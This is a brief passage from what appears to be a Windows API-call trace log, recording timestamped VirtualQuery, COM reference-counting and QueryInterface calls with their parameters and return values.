wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0024.564] VirtualQuery (in: lpAddress=0x26e100, lpBuffer=0x26e0e4, dwLength=0x1c | out: lpBuffer=0x26e0e4*(BaseAddress=0x26e000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0024.565] IUnknown:AddRef (This=0x6de4f0) returned 0x2 [0024.565] IUnknown:Release (This=0x6de4f0) returned 0x1 [0024.565] IUnknown:Release (This=0x6d29d8) returned 0x0 [0024.565] IUnknown:QueryInterface (in: This=0x6de4f0, riid=0x74ba1d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x26ee6c | out: ppvObject=0x26ee6c*=0x6de4f0) returned 0x0 [0024.565] IUnknown:Release (This=0x6de4f0) returned 0x1 [0024.565] _strnicmp (_Str1="